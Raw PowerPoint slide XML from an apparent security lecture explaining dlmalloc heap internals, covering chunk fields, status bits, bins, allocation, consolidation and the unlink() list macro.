              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starts at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually 8 bytes overhead for allocated chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17911917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507" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="919655" y="1314450"/>
            <a:ext cx="6669690" cy="3121819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89373654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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To reduce memory waste, field can hold user data of previous chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk size in bytes, but size is always a multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunk size = requested memory (by user via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) + 8 bytes (overhead) - 4 bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field of next chunk) rounded up to next multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 3 least significant bits of the size are always 0, so two of them are used as status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PREV_INUSE (0x01) – 1 if previous chunk is in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IS_MMAPED (0x02) – 1 if chunk is memory mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77989873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Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="13716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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083396" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="16002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3397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="182880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3398" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="25146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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083399" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="27432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3400" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3429000"/>
            <a:ext cx="2362200" cy="3429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free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083401" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="37719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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="40005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3403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="422910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3404" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="18288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05" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="1485900"/>
            <a:ext cx="934471"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A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083406" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="29718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 pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083407" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="32004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 pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083408" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="42291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09" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="3886200"/>
            <a:ext cx="939580"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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083410" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2571750"/>
            <a:ext cx="76200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 175000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEn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1" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2914650"/>
            <a:ext cx="932066"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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="13716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3" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="37719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4" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="25146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5" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="24003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6" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="12573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7" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="36576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8" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="17145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User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083419" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="41148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User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38579419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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049605" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available chunks are maintained in bins, which are doubly-linked lists of free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bins are organized by sizes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunks are maintained in decreasing sorted order by size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1049606" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="814552" y="3021067"/>
            <a:ext cx="6120523" cy="1721644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16870576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700" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053701" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of corresponding bin is scanned (starting backwards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk of exactly correct size is found (chunk size is equal or bigger by not more than 16 bytes than the requested size), it is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most-recent remainder of split is used (when large enough)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Split it if it is too big, return it when size is exact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other bins are scanned in increasing order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return chunk of exact size, split one that is too big</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418351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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Deallocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055749" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When the chunk to be freed borders the wilderness chunk, it is consolidated into it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk before the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk after the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Consolidation of chunks involves operating on the bin, removing the old chunk and adding the consolidated chunk to a new bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172965404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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunks are handled, their entries have to be taken off or inserted into the corresponding lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is responsible for removing entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to extract from the list the entry P with its pointers FD and BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink(P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67306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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications provide services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locally (e.g., word processing, file management)</a:t>
            </a:r>
          </a:p>
